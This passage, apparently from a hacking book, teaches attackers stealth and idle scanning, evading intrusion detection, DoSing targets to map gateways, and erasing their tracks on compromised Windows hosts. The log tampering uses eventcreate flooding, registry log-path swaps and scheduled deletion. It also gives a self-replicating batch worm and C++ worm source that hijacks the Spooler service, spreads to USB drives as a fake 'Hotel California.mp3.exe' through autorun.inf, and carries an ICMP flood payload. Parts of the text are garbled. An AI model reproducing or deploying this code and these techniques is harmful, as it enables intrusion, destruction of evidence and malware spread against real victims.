the attacker gathers information about the services provided by the victim system.Target Scanning Once attacker identifies the victim system he can launch a target scanning attack. This problem can be overcome by making the process much slower. We can use the NMAP utility in Linux systems. Note: The recon phase is much noisy phase during the attack and it can invoke the IDS (Intrusion Detection System) and IPS (Intrusion Prevention System). But remember that the easy backdoors may be honeypots. It leaves no or very few traces of your activity. And the port number should be randomized effectively. In this phase of attack. We can use the SSH service which provides a shell with the encrypted connection to remote Linux system. Thus the target systems administrator can be alerted. The same shell can be used to attack the remote systems without much trouble as the data gets encrypted on these systems. The honeypot is a dedicated system or network containing simulation of corporate systems or networks to study and observe the hackers activities. the using the stealth scan of NMAP it becomes hard to trace back the attacker. which helps in designing the effective techniques to thwart such attacks. The attacker should first check out the vulnerable services first to save time. Then use the remote systems NMAP and carry out the stealth scan of target system. Moreover. But remember to bounce other systems between attacking host and the NMAP host and then scan the target systems. The attackers must have to tackle this problem by slowing down the packet sending process to nearly within 9 or 10 packets/day to target systems or networks or even smaller. Actually the scanning generates a huge amount of network traffic and a familiar signature of the scanning phase can be determined by effective surgery of traffic and observing the flags and the port numbers incrementing or decrementing continuously. The NMAP uses stealth technique to scan the hosts. Remember to use the encrypted channels as much as you can do. The Linux administrators use SSH service to administer the Linux systems remotely and securely thwarting the sniffers activity. The Idle Scanning 265 .
it will be changed by one only for the packet sent to the attacker system. The idle scanning is most safe and there are no chances to be caught and provides the full control over the scanning phase. Then if the remote host will be serving at that port. Therefore. Remember if target administrator gets the suspicion. then he may take some extra precautions and making the process tougher to be hacked. If the idle host is not fully idle or a mild traffic is on the idle host. which can be checked by sending a packet to the idle host and analyzing the IPID of the received data packet from idle host.The scanning phase is most prone to be caught by IDS or IPS systems and logging servers and most of the scanning software do not provide full control over their working to us. the spoofed address will be of the idle host. This does not require sending any response from idle host. We’ll send the spoofed SYN packet to a remote target host on a desired port. Thus the IPID of the idle host will remain constant and can be checked by sending again a data packet to idle host and searching for IPID in data packet. it will respond with a SYN/ACK packet to the idle host. And its IPID will change by one step. But as idle host did not start this connection at all and will not have any knowledge of what is going on it will respond with a RST packet. But if the remote target system does not listen at that port then it will respond with a RST packet to the idle host. we should them as much as we can. it will be incremented by two steps one for RST packet sent to the target system and other for the packet received on attacking system. A large difference in IPID (n or a little more than 266 . In idle scanning the first job is to look for an idle remote host somewhere in the world connected to the Internet. then we can send a fixed number of many data packets like n = 10 or 15 data packets to the target system and observing the change in the IPID of the idle host. Idle means sending and receiving no traffic at that time but still connected to the Internet. Every data packet is provided a unique ID called the IPID. The IPID increments in steps of either 1 or 254 (depending upon the OS like for win95 it is 1 and for win2000 it is 254) with every packet sent.
n) will show that the port is open and none for closed port. But remember, even 10 data packets are large enough to be caught by remote firewall or IDS systems to raise the alarms, therefore avoid it. This process is most secure method, if the idle system does not keep logging of single packets (mostly not done by default to keep logs compact), then the attacker can never be tracked and she can scan any target host in the world without being caught.
267
The Target Profile Construction This phase helps us visualizing the target organization & its system setup. This phase of attack is similar to the software-designing phase. In this phase the attacker creates visualization of target & its internal setup in his mind by processing the information gathered in recon phase. On the defending side, the system administrators use all the methods to mangle the leaking information about their system setup (system includes network, computers, other machinery and all work setup of target). This phase depends vastly upon the guesses of the attacker. This phase of attack is used to create an internal architectural diagram of whole target system. The visual diagram so created uses all single bit of information like, building design, network design, computer systems used, working hours, the different IP addresses assigned to the organization, the domain names assigned to the target etc. There are few terms which may encounter during this phase which are as: DMZ: Demilitarized Zone. It is the network placed between two networks. One of which is untrusted network like internet and the other one is internal network. The DMZ is the No Mans Land of networks. The DMZ is placed in such a way that the resources of DMZ are available for both the networks. The DMZ is acts as first line of defense. The attacker has to compromise the DMZ first before getting inside the internal network. Between DMZ & internal network a firewall is placed, which protects the internal network by filtering the traffic passed through DMZ. Honey Pot: Honey Pots are the computer systems or networks placed in DMZ, which seem to be the original internal systems or networks and advertise themselves as having the precious information or seem to be less immune for attacks. The honey pots are used to engage the attackers and study their way of attack, so as to develop a strategy against
268
such attacks. It is very difficult for attackers to identify the honey pots from original systems. But attackers use a simple guess strategy, which is as, if a very high profile & financially strong target seem to have a very weak network setup, seem to have some precious information and having vulnerable services and very poor protection, or a backdoor installed, then it may be a honey pot, leave it immediately and try some other point on the target network.
269
E-mail Bouncing This technique is used to look inside the network and visualize a part of the network architecture. This technique is applied, if the mail server of target is situated inside the target network. An e-mail for a non existing user is sent & attacker waits for the bounced back e-mail. The bounced email contains all juicy information in its headers. The e-mail headers contain the information of the path followed and the address of originating server. The path information contains the IP addresses of each system and router encountered during transmission of email. Thus, we get information about the internal network and the gateways to the target networks. For security reasons, attackers do not use their own email ID which may point back to their own ID. The e-mail headers can be checked in outlook express or any e-mail agent.
270
Tracing the Route The route to the target host is the path followed by the data packets to reach the target system. The route consists of several hops (the routers or other computers in between the target and attacking system). The routes are of two types, the static route & dynamic route. The static route is a permanent entry added in the routing table. While the routes which are not static and prone to change depending upon the network conditions. The route between attacker system & target network may be of dynamic nature. The route tables can be checked in windows systems by route print command or netstat –r command as
C:\Documents and Settings\vinnu>netstat -r Route Table ========================================================================= Interface List 0x1 ........................... MS TCP Loopback interface 0x2 ...00 13 20 2a bb 02 ...... Intel(R) ========================================================================= Persistent Routes: None
If an attacker by somehow adds a persistent route (static route) entry in routing table then, he can sniff or hijack the whole traffic outbound from that system. The false entries in route table may bring down the whole network. A persistent route can be added by using route ADD command. Coming back to main discussion, the route information can be achieved by using Tracert in windows systems or Traceroute utility in Linux systems as
The Tracert or Traceroute use a simple technique which
271
employs the generation of ICMP TTL expired packets from the hops. The TTL is Time To Live which. The TTL is either time in seconds, which can be 256 seconds at maximum or number of hop (routers). TTL limits the age of packets, otherwise packets will fill up the whole world network and no resources for new packets will be available. Therefore, the packets die after 256 seconds. The packets travel with nearly with speed of light. After crossing a hop (router or gateway) the TTL value is decreased by 1. Thus, at the most, a packet can cross up to 256 hops. And the packet dies when TTL exceeds 256. The Tracert utility creates a packet with TTL = 1 & sends it towards the next hop in network. Now, when packet reaches the next hop, the hop decreases the TTL by 1 and new value of TTL = 0. As TTL becomes it generates the ICMP TTL expired message and send it back to the source. The ICMP TTL expired packet contains the information about the hop, like its IP address and domain name etc. Now we got only one hope which is the next system from our attacking computer i.e. gateway or router. Now the source Tracert utility generates another packet with increment of 1 i.e. TTL = 2. In this situation the packet will cross one hop and that hop will decrease its TTL by one now TTL = 1 and packet will cross this hop, at next hop the TTL is again decreased and becomes 0. The TTL expired packet is generated by the hop and sent back to the source system. The packet contains the information about second host. In this way the whole route can be traced.
272
Remember that the most security things reside on gateway itself like security guards in real life at building’s access points i. the failures of network gateway can completely shutdown the business. For attackers. at the gate. reduces the infinite frame loops and packet storms. The spanning tree protocol controls the multiple channels to a single network entity and thus. For attacker’s point of view. Network Gateway: A network gateway can be a computer or an interface of a router that lies in same internal network & connects the internal network with external networks. as it decreases the chances of sniffing the connections in control channels. The ACL contains what is permitted to go inside and what not. In routing environments. the different gateways to same network may have different Access Policies defined for firewalls (the ACL Access Control List). If one gateway will be overloaded then the rest of the traffic will be allowed through other gateways. 273 . such functionality is provided by the protocols like OSPF (Open Shortest Path First) and BGP (Border Gateway Protocol) etc. Another reason can be to provide the reliability of services for their customers and users by reducing the failures. The solution of this problem is to have more than one network gateways for a single network. There may be a gateway configured for unconditional access of internal resource and network systems by the administrators remotely. The network and routing protocols force the services to use only a single network gateway at a time if both gateways are up to reduce the redundancy. This is done to separate or control the other gateway channels from the controlling channels. The example of one of such protocol in layer two switching environment is spanning tree protocol.Multiple Network Gateways Detection In the world of networks. the knowledge of multiple gateways on target network system may be a golden egg in hands.e. Access Control List: The ACL is the set of rules defined by administrator for the firewall to follow it up.
if both the network channels are up. And compare the results of route tracing & find out whether the target used the other gateway for reliability of its services. if a huge time difference is introduced between two Tracert queries. In second technique. how to find out the other gateways. more the chances to catch up the other gateway as the other gateway may be already used up by legal connections. We can DOS (Denial of Service) attack or send huge ping packets or broadcast ping queries to target system or can open up a large number of simultaneous fake connections. when all gateways are up and only one is used at a time.Note: Remember. There are several techniques. 274 . We can also use DENSER. The first technique employs the checking of route information by Tracert or Traceroute command on different times of the day and night. packet storms and infinite connection loops.EXE for this reason. More the work load on target system. while the condition at non-working hours may be different. For better results. to reduce the redundancy. So the difficulty is that. The one Tracert may provide juicy information during the work hours. This technique is most secure as it produces less noise to be caught in IDS/IPS system. only one will be used at a time. we have to forget about the IDS/IPS system. every trace route query should started at a little time difference of few seconds. but these techniques should be used depending upon the security implementations of target systems like IDS/IPS used by the target victim. We are going to create a resource eating packet storm on target network. trace the route every second by sending several queries to the same target. The above listed second technique should yield juicy information about target network gateways and route followed in different conditions. Actually we intentionally fill up all the network channels through one network gateway already in use and then trace the route.
In this technique. The geographical distance among trace route attacker systems should be at least of different ISP (Internet Service Provider) or for better results if route-tracing queries are done from systems from different countries. the route tracing is done from different geographical positions. The path followed in third technique will always be different to the gateway of target network. Thus there may be chances to catch up the underground gateways because of OSPF or BGP protocols. 275 .The third technique is also there & is secure enough so as not to be caught up in IDS/IPS systems.
The proxy is actually a kind of firewall. Actually this command is used for troubleshooting purpose. The proxy opens a HTTP port (port 80) on itself and act as web server.webserver.com 80 The connection is formed and the screen clears up immediately only a cursor blinks. proxy server fulfills the request of the client by sending the requested web page from its own cache. Actually a layer of proxy server is introduced between untrusted Internet & the web server. The proxy servers are capable of caching the web server contents during their work. The web server shown to the external world is actually proxy server. 276 . These proxy servers are transparent and pretend to be the web server themselves. this is the way http connection on telnet works. Telnet to the web server at port 80 as Telnet www. The proxy servers are capable of filtering the packets and surveillance of connections to the web server. Actually there is a HTTP command that force all the proxy servers to enlist their address in the packet header. Thus. thus reducing the work load on web server. Is there any way to know the actual network path followed by a packet to the web server and reveal all the proxies working in between the client & the web server? The technique to reveal the proxies is known as proxy tracing. This act of proxy can foil the attack attempts as actual web server is hidden behind the proxy server. instead of sending the request for a web page to web server. The HTTP port from proxy server forms a pipe (a channel) with the HTTP port on web server.Web Proxy Detection The web servers are not directly connected to the internet.
But if there will be proxy servers in between the client and web server. The HTTP commands are always in upper case.Now parse it the command TRACE / <enter><enter> Remember after TRACE / press enter twice. the addresses of proxy servers will be shown in the output. But as you’ll press enter key twice. it will show nothing other than a blinking cursor. this is the HTTP convention to terminate the command. This happens if the return path of the packet is same as entering path. Note: While typing in the telnet window. This command makes a data packet which knocks the web server and returns back to the client machine. 277 . The output in that case can show the same address twice. The result of above command is as Well friends the above picture shows the output of TRACE / command operated on the local web server residing on the same computer system on which the client resides and having no web proxy at all. it will show the results.
The Intrusion 278 .
The Penetration by Registry Once we have the victim system’s administrative password either via hidden shares enumeration or sniffing the hashes or via any other means. we can widely open the victim by using its registry hives remotely. 279 .
The Spider Hacking 280 .
There are few terms that should be cleared before proceeding in this field. htm. or even specific file types like log. It doesn’t matter whether site owner has registered with the particular search engine or not. The spider is a program capable of crawling several hosts itself for seeking information. xls. The advance search has evolved branch of hacking known as “The Spider Hacking” (e. Google Hacking. Spider: A spider is a bot capable of performing tasks at several locations. The Google employs advance search technique. The best example of spiders is search engine. exe.…etc. one those search in title or keywords and while the other one are those implements the advance search technology. Well friends now its time to jump into the practical study of the spider hacking. Advance search technology has turned Internet as a public entity & anything attached to Internet is no more private. xml.The Spider Hacking The spider hacking is the new form of high-tech hacking.g. URLs. Aggregator: An aggregator is a program. we are going to learn little bit ahead). txt. even the text or contents of the page. With the implementation of advanced search technology in search engines the definition of Internet has been totally changed. cgi. asp. The one of the most powerful spiders available for public is Google. which accumulates and formats the information collected by bots and spiders and displays this information in human understandable format. Bot: A bot is an automatic program capable of performing tasks at single location. The search engines are of two types. The spiders are utilized in search engines. 281 . The advance search spiders search engines have the ability to search not only in keywords-meta-headers of web pages but. The advancement in processing performance and efficiency of hardware and spider software can grind up whole of universe in matters of few hours. cache. title.
282 . who has not patched his server or who is using the old vulnerable software versions etc. look for victims providing a particular vulnerable services. For examples the following page will show you the aftermaths. We can identify a huge number of victims within a second around the world with google. Sometimes we even don’t need the exploits to crack into the systems. And the list is endless. we can even identify that. We landed on this page without any authenticating process directly using google. We can scan hosts around the world using google.The Google Hacking The google is a powerful tool in hands of a hacker.
jp/~cru/library/zddbbs/cgibin/minibbs_s.0 (compatible. which is meant to be hidden from external world and is only for sysadmins like this: The above listing reveals some ones internal network systems information and even a guess of operating system on its web server.103.jp/~cru/library/zddbbs/cgibin/minibbs_s.0 (Windows 98. Windows NT 5.xxx.138 REMOTE_PORT=47640 107/10/23 19:29:33 [xxx-xxx-xxx.xxxx.xx/~cru/library/xxxxbs/cgibin/xxxbs_s.138](ERR:Ug1) HTTP_CONNECTION=keep-alive HTTP_HOST=www2s.xxxx-xxxx.ne.138](ERR:Ug1) HTTP_CONNECTION=keep-alive HTTP_HOST=www2s.138 REMOTE_PORT=35550 283 .xxx.103.cgi HTTP_USER_AGENT=Opera/4.ne.US) Beta 3 [en] REMOTE_ADDR=xxx.cgi HTTP_USER_AGENT=Mozilla/4.ne.206 REMOTE_PORT=23476 107/10/23 17:02:02 [xxx.1) REMOTE_ADDR=xxx.0 (Windows 98.xxx.biglobe.we can even search for that information.com] HTTP_HOST=xxxxx.xxx.biglobe.138 REMOTE_PORT=62427 107/10/23 21:01:18 [xxx.xxxxxxlone.cgi HTTP_USER_AGENT=Opera/4.ne.xx.213.xxx.US) Beta 3 [en] REMOTE_ADDR=xxx.ne.xxxxx.xx HTTP_REFERER=. Whereas the situation is much worse in following section: 107/10/23 23:01:47 [xxx.xxx.103.138](ERR:Ug1) HTTP_CONNECTION=keep-alive HTTP_HOST=www2s.jp HTTP_REFERER= HTTP_USER_AGENT=Opera/4.xxx.biglobe.203.103.103.ne.103.US) Beta 3 [en] REMOTE_ADDR=xxx.biglobe.jp HTTP_REFERER= (Windows 98. MSIE 6.biglobe.xx.jp HTTP_REFERER=.
xxx.US) Beta 3 [en] REMOTE_ADDR=xxx.jp/~cru/library/zddbbs/cgibin/minibbs_s.138 REMOTE_PORT=36367 107/10/23 10:42:50 [xxx.xx HTTP_PRAGMA=no-cache HTTP_REFERER=http:// wwwxx.biglobe.biglobe.103.138 REMOTE_PORT=35752 The above block is a listing of server log retrieved using the google advance search. This log reveals a lot of IP addresses along with their operating system type and browser type.US) Beta 3 [en] REMOTE_ADDR=[xxx.xxx.107/10/23 15:01:36 [xxx.138](ERR:Ug1) HTTP_CONNECTION=keep-alive HTTP_HOST=www2s.138 REMOTE_PORT=22451 107/10/23 04:34:07 [xxx.jp/~cru/library/zddbbs/cgibin/minibbs_s.c3.ne.0 (Windows 98.biglobe.cgi HTTP_USER_AGENT=Opera/4.xxx.jp HTTP_REFERER= (Windows 98.US) Beta 3 [en] REMOTE_ADDR= xxx.jp HTTP_REFERER= (Windows 98.xxx.biglobe.xxx.xxx.jp HTTP_REFERER= REMOTE_PORT=13126 107/10/23 08:34:41 [xxx.0 (Windows 98.ne.138](ERR:Ug1) HTTP_CONNECTION=keep-alive HTTP_HOST=www2s.cgi HTTP_USER_AGENT=Opera/4.xx.US) Beta 3 [en] REMOTE_ADDR= xxx.0 (Windows 98.ne.ne.0 (Windows 98.ne.xxx. en) REMOTE_ADDR=81.103.US) Beta 3 [en] REMOTE_ADDR=[xxx.jp/~cru/library/zddbbs/cgibin/minibbs_s.cgi HTTP_USER_AGENT=Opera/9.jp HTTP_REFERER= HTTP_USER_AGENT=Opera/4.103.xxx.138 REMOTE_PORT=58145 107/10/23 09:06:35 [user-514f7d61.138](ERR:Ug1) HTTP_CONNECTION=keep-alive HTTP_HOST=www2s.cgi HTTP_USER_AGENT=Opera/4.138](ERR:Ug1) HTTP_CONNECTION=keep-alive HTTP_HOST=www2s.biglobe.ne.138 REMOTE_PORT=11093 107/10/23 02:34:30 [xxx.xx.103.biglobe.ne.138 REMOTE_PORT=27901 107/10/23 12:54:46 [xxx.xx] HTTP_HOST=wwwxx.cgi HTTP_USER_AGENT=Opera/4.138 REMOTE_PORT=18050 107/10/23 06:33:25 [xxx. U.ne. even the port numbers used at that time and the directory structure.ne. 284 .103.0 (Windows 98.jp/~cru/library/zddbbs/cgibin/minibbs_s.xxx.US) Beta 3 [en] REMOTE_ADDR=xxx.biglobe.103.103.xxx.103.xxxx.biglobe.ne.biglobe.xx /~cru/library/xxxbs/cgibin/xxxbs_s.xxx.l4.ne.103.138](ERR:Ug1) HTTP_CONNECTION=keep-alive HTTP_HOST=www2s.0 (Windows NT 5.xxxx.103.ne.biglobe.jp/~cru/library/zddbbs/cgibin/minibbs_s.cgi HTTP_USER_AGENT=Opera/4.xxx.jp HTTP_REFERER=) Beta 3 [en] REMOTE_ADDR= xxx.xxx.138](ERR:Ug1) HTTP_CONNECTION=keep-alive HTTP_HOST=www2s.103.xxx.1.biglobe.jp HTTP_REFERER= HTTP_USER_AGENT=Opera/4.138](ERR:Ug1) HTTP_CONNECTION=keep-alive HTTP_HOST=www2s.jp/~cru/library/zddbbs/cgibin/minibbs_s.jp HTTP_REFERER=.
Don't be cocky. Whole different ball game.Five minutes flat. . This is the easy part. I'll be fine. Perspiration on your fingertips.The Termination We gotta get Steve out of the house. . How much time do you need? . heart's pounding. It's not the same as opening a safe for the police.I appreciate your concern. The getaway can get us caught. Italian Job (Hollywood Movie) 285 .
Then the log clearing process comes into action. SMTP etc. The attacker ensures that the victim system is altered enough for an easy later entry. then never use the edit command. While as other system logs like system. Even the rootkits also fill these syslogs with junk data like “AAAAAA”. But you need a lot of practice to use edlin. And they can isolate the system from network and can keep an eye on the victim system for future entry and can bust the attacker. ftp. etc and 286 . Instead use the edlin text editor found in windows. If we are at admin level (root). the default log files are created under %systemroot%/system32/logfiles folder. Most people don’t plan this phase of hacking and unfortunately leave their traces. This phase of hacking constitutes the log clearing and then safe termination. Instead we are going to discus some other inbuilt techniques for this purpose.The Termination & Safe Getaway This is the most important part of the whole hacking process.]) then. There are only tutorials available for the Linux log clearing even a huge set of software is available for this purpose. It must bring the suspicion of sysops. as it is not so much user friendly as edit. If we are hacking via the IIS services (Microsoft’s Internet Information Services [www. Note: Never delete the log files or clear the whole text of log files. If we are connected to a remote victim system via command console. But we are not here for script kiddy training. We must have to plan even the tidbits of this phase. Just type edlin at command console for viewing its help type “?”.exe. This phase of hacking makes difference among hackers & script kiddies. then we can easily erase the lines including our IP addresses and other desired entries. it will hang out the connection. application and security can’t be easily cleared.
FOR /L %x IN (1. Just type the following script in command console and then watch out the effect click and open the following control panel\administrative tools\event viewer then select System. then it will start overwriting the older events.1.can bring the victim system under suspicion of a cracked box.9) DO eventcreate /T ERROR /ID %x /L SYSTEM /D "The fatal error 0x007a45d7 caused the memory fault" 287 . otherwise the system halts. Therefore. We can also use CreateEvent function in C++ for the same purpose to develop our own program for filling the syslogs. There are some strategies used to maintain the log files. We can use the eventcreate command in windows XP along with the FOR command to create several events to fill up the event logs. we are creating 9 subsequent events in System syslogs. we need some other techniques. Like if the log file size increases than a certain limit. Well there is a facility provided by the windows XP to create the events in event logs. In the following script.
the logfiles will get switched to the files having none of our traces. During termination process. we can force shutdown the victim system so that when it will reboot. we need to delete the original logfiles. This process requires no third party software & is safe. But it requires restarting the victim system. There is actually no way to delete the individual lines from these syslogs. It is because the OS Kernel exclusively opens these syslogs. Also. For this purpose. With AT command we can only specify it the time. We can only view the entries in these syslogs by copying their log files from %systemroot%/system32/config directory. we can clutch & shift the eventlog service from original log files to desired log files. we can schedule a task with AT command so as to delete the original logfiles at next reboot.We can create the events in Application. But if we are root (admin privileges) on the victim. System or Security syslogs. Instead we can also use SCHTASKS command from console window to add a task while computer starts or while user logon using /MO switch with ONSTART or ONLOGON switch 288 .
One important command is reg. The following is the path of Eventlog service HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog Under Eventlog key we can see three log types Application. Security & System. 289 . we can open the HKLM registry key in local computer’s registry editor using File\Connect Network Registry. Note: Once we are root on a remote system. Or even we can use the console registry commands to alter the registry settings. we can also schedule to rename all of our switched logfiles back to the deleted original logfiles of the system and then again change their names in the registry settings. This is the string value type registry variable containing the path of log file.For extra security. Select Application and in right pane double click File.
We can achieve all these steps by scheduling each & every step with perfect timings. After this.Copy the original logfiles and edit the copies so as to remove the intrusion traces and specify their name and path here in this variable in all log types. For extra security measures. The following picture shows the options of reg command. The following command will modify the registry settings for Application log 290 . we should again change the log file names to original log file names in registry settings and copy the switched logfiles with original log file names. Then reboot the victim system once again and after that delete the earlier switched log files. Now schedule a task of deletion of original logfiles for execution immediately at next reboot. It will switch the logfiles. force the system to restart it.
The system logfiles also employ unique structure for each & every event. Diffying Attack: In this kind of attack. A bad thing about windows log files is that these files are not protected by any kind of checksum or hash code. We copied the application log file and our both copied instances were having the difference of only single event.g.reg add HKLM\SYSTEM\CurrentControlSet\Services\Eventlog\Application /f /v File /d %%systemroot%%\system32\config\AppEvt. We can use any utility capable of differentiating two files e. This makes them vulnerable and dependent on the perimetric security. Therefore we must now how to alter the logfiles. which has its own limitations. hackers find out the differences among different instances of same object and then alter the instances themselves and feed the altered instance to the victim system and force the victim system to do as desired. Well friends. every log file has a unique structure in itself. But still there may be the traces of suspicious nature. FC command at command console is a handy tool for this case.evt It may be difficult to edit the log traces in console mode. 291 . therefore it is advised to copy all the logfiles just after the intrusion is successful and before doing other stuff. We can identify it by copying the log file at two different instances and applying the diffying attack on them.
292 .
The Artificial Life Where there is a brain. “v” 293 . there is no barrier.
In this section we are going to deal with the code which can work on its own. we are tending to discus the worms and virii in this section. learning without the need of anyone else. take the decisions and reproduce itself. which can not only behave like living organism. 294 . Your guess is write. if we start creating or better say manufacturing the things. We are going the discus the concepts which can help in learning. The artificial life is the eighth wonder of this universe created by the recreation hackers. The hackers without the knowledge of working of the virus and worms are not truly the hackers.The Creation of Artificial Life The artificial life is the most hottest topic since the evolution of robotics and virology. taking decisions and working on its own and most important. but truly capable of reproduction. how to produce such living code organisms. Think about it. We’ll start with the simplest code that incorporates the console commands in a batch file & then slowly move towards the most sophisticated link virus structure.
whereas in another approach the polymorphism is exhibited. in such a way that the original file can exist in several directories or in same directory with different names. either creating the fresh copies of these disk files or by creating the hardlinks ( hardlink is a link to the existing file. the mostly used two ways are. The reproduction of worm. The editing from one link reflects in all hardlinks. Whereas the virus acts just like the bio-organic virus. the execution is transferred to the software’s main code. after processing the viral code. actually all the links point to same physical location on file system). 295 . the exe link virus exploits the exe header information and injects its own code in existing executable programs.Worm and Virus The people often use the worm and virus interchangeably for one another. The deadliest form of virus. First of all. which means. It relies on the other living cells for its existence. before the main code of the software executes. which is negligible for human perception & the virus infection remains unsuspected. The hardlink approach is used to avoid the disk filling of the host system as a result of the reproduction. these files are executed to execute the worm. in which the worm’s reproduced copy is different than the host worm. The worms have their own physical existence. can be done in several ways. This viral processing action is so fast that the processing lag is worth few milliseconds. This is done in such a way that the viral code gets the executional control. we might know that what is the basic difference between a worm and a virus. The hardlink approach is capable of reproduction on single logical partition only. they have their own disk files.
Well.”.cmd.\traverse.. execute the copied file. Open the notepad and type in: @echo off copy traverse.. Have you ever bothered about the two subdirectories automatically created in a directory.cmd attrib +h . 296 . can reproduce itself. These are “. whereas the command (II) will show the contents of previous directory..” is used to point to the previous directory. Now lets create a code which can copy itself in previous directory and then.. it will be in every directory in the path with the hidden attribute set. 2) Dir .” And “.bat. which. using dir command on command console. Now check out all the previous directories in the path for the existence of the file traverse. whereas the double dot “. I II The command (I) will display the contents of same directory. the single dot directory “.\traverse.. but then change it in the above code also.cmd . You can check it by following dir commands: 1) Dir . traverse And save the file with name traverse. its time to practice some simplest code creations.cmd you can also use the extension .cmd cd. Save this file somewhere deep down under the several folders and double click it from there.The Simplest Traversing Friends. you can find them in every directory..” Is used to point to the same directory.
But this will not stop the advanced worms. The one very effective worm termination script is FOR /L %I IN (1. you should create the worm termination scripts first and always observe the process lists and cpu and memory performances in task manager. if anything goes wrong during development. You should add the automatic boot up triggers in the last phase of the worm development process. the trigger section might not trigger too much clones. There may be other sections like payload section. Every worm has a mission and after the completion of its mission finally the worm should terminate the host processes or remove the worm files from the hosting victims. One section takes care of its reproduction (also called cloning) and the other section triggers the reproduced copies. but in our first worm. We’ll apply the concepts studied earlier in this section. This gives an advantage of smaller size and the speed optimizations and much more control of developer over the worm or virus. decrypting block and exploits section. always document your worm in a file sidewise.Worm Coding The worms and viruses are mostly code in assembly language. the worm development also creates some problems for the developers. lets discus a little about worms structure. this can terminate only the worms with very 297 . Before starting to code our first c++ worm. But we are going to discus the worm creation in c++ in this section. you might backup your important data before proceeding. the clone section and the trigger section. the encryption section. During development phase. One more thing friends. otherwise the system will get overloaded and will be suspected for infection. etc. this documentation will help you understand if anything went wrong. Also. 100) DO TASKKILL /F /IM “WORM_EXE_FILE” /T The above script is quite effective if worm goes wild during development phase. The worm has at least two different sections. this will help you a lot. 1. Extra care must be taken here that. we are going to code only the two sections. therefore.
NULL. PROCESSNAME. refer to the socket programming section. In this case the worm has been assigned the mission to flood the network segment with broadcast icmp packets. The target IP address can easily be changed to any victim to launch a resource eating attack on the target network by changing the macro IPADDR from broadcast address to the host to network transformed if address number. The newer process has a new process ID and all resource allotments are done exclusively for it again. Next a worm should have a mission. char* argv[]) return EXIT_SUCCESS.dll will accomplish this task.weak mechanism. the payload section is determined by the mission or motto of the worm. IcmpSendEcho & IcmpCloseHandle. this script also eats up the cpu and makes it usable 100%. 298 . If you don’t know about it then.h> #define PROCESSNAME “testproc. Thus after double clicking the executable file the process will keep in executing recursively in the memory. The process in this case will not have any window."open".exe” using namespace std. this script will give up then. Remember. IcmpCreateFile. But once the worm employs the automatic boot up triggers. The ShellExecute() function determines the file launcher depending upon the file type (the file extension).cpp */ #include <iostream> #include <windows. 0). Let us start with a little program that once started will execute itself recursively and will never end. The following three functions from the icmp. The following code is the simplest program employing the recursive execution technique: /* testproc. This technique is called recursive execution technique and the process launches a fresh executing clone process of itself before terminating itself. } { ShellExecute(NULL. int main (int argc. NULL.
The worm also reproduces itself from one system to another and launches in another system.h> #include <direct. The autorun.cpp */ #include <iostream> #include <windows.inf automatically launches the worm file automatically. #define PROCESSNAME "virus4. Flags. The following code accomplishes all the things discussed above and compile it and execute the executable file to execute worm /* virus4. *OptionsData. RoundTripTime. The worm changes the executable file path to a copy of itself in system32 directory. { { unsigned char Ttl.\\virus4. for this purpose. The next step is to make the worm launch itself when the system boots up. struct E DWORD Address.exe" #define PROCESSPATH ". in following code. then copies itself with the name defined in DISGUISE macro. Tos.h> #include <sys/stat. the worm creates a new thread. /*-----------------The icmp global section-------------------*/ struct o }. We have chosen the Print Spooler service for this purpose.exe" #define DISGUISEPATH "\\Hotel California.exe" #define PROCSSPATH "\\virus4. if found. For this the worm configures the settings of a service.h> #define DISGUISE "Hotel California.exe" #define ENVOKER "\\envoker. which checks for the USB removable drives. we have named it “Hotel California. // The address to be attacked with 299 . unsigned long Status.mp3.exe” and creates an autorun.exe" #define FILEATTRIB 34 #define IPADDR INADDR_BROADCAST icmp echoes. OptionsSize.exe" using namespace std.mp3..mp3.inf file.
ENVOKER). struct o Options. FILEATTRIB). strcat(envokerPath. DWORD. strcpy(envokerPath. PROCSSPATH). char systemPath[101]. LPVOID. CopyFile(file. 0). envokerPath. SetFileAttributes(PROCESSPATH. systemPath). 50). void *Data. DWORD d. SetFileAttributes(systemPath. char aa[100]. systemPath. struct E es. strcat(systemPath. buffer[201]. HANDLE ( WINAPI *pIcmpCreateFile) ( void ). DWORD). struct o I. system(buffer). SetFileAttributes(envokerPath. WORD. struct hostent *phostent. Reserved. FILEATTRIB). LPVOID. NULL). GetSystemDirectory(systemPath. FILEATTRIB). LPVOID. envokerPath[101]. CopyFile(file. HANDLE hIP. THREAD_PRIORITY_HIGHEST). WSADATA wsa. DWORD. strcpy(buffer. }. envokerPath). PROCESSPATH. DWORD ( WINAPI *pIcmpSendEcho) (HANDLE.unsigned short DataSize. HMODULE hicmp. CopyFile(file. strcat(buffer. BOOL ( WINAPI *pIcmpCloseHandle ) ( HANDLE ). "SC CONFIG Spooler error= ignore binpath= "). /*----------------------------------------------------*/ void _declspec (dllexport) identify(char *file) { SetThreadPriority(GetCurrentThread(). } void _declspec (dllexport) systemProc(char *proc) { 300 . 0).
countsys++) _asm { nop } */ /* The payload code can be inserted here. strcpy(newloc. fprintf(fp. // If not then copy the file. "[autorun]\nopen=%s". i++./** * The payload section. drive[2] = '\0'.inf"). strcat(newloc. 0). /* The code will be executed with highest privileges */ // This line fetches the removable drives. autof[20]. THREAD_PRIORITY_HIGHEST). DISGUISE). &stbuf)) == -1) { already exists in the pen drive. // Check if file 301 . DISGUISEPATH). } void _declspec (dllexport) procCloner(char *cfile) FILE *fp. drive[1]= ':'. strcat(autof. **/ SetThreadPriority(GetCurrentThread(). i < 256. "w"). strcpy(autof. let++) if (let > 0x5A) let = 0x43. struct stat stbuf. newloc. CopyFile(cfile. newloc[30]. for (int i = 0. The payload will run as an service. char drive[3]. "\\Autorun. if ((GetDriveType(drive)) == 2) { { { SetThreadPriority(GetCurrentThread(). int let = 0x43. drive[0] = (char)let. if ((stat(newloc. fp = fopen(autof. drive). countsys < 10. THREAD_PRIORITY_HIGHEST). for (int countsys = 0. drive).
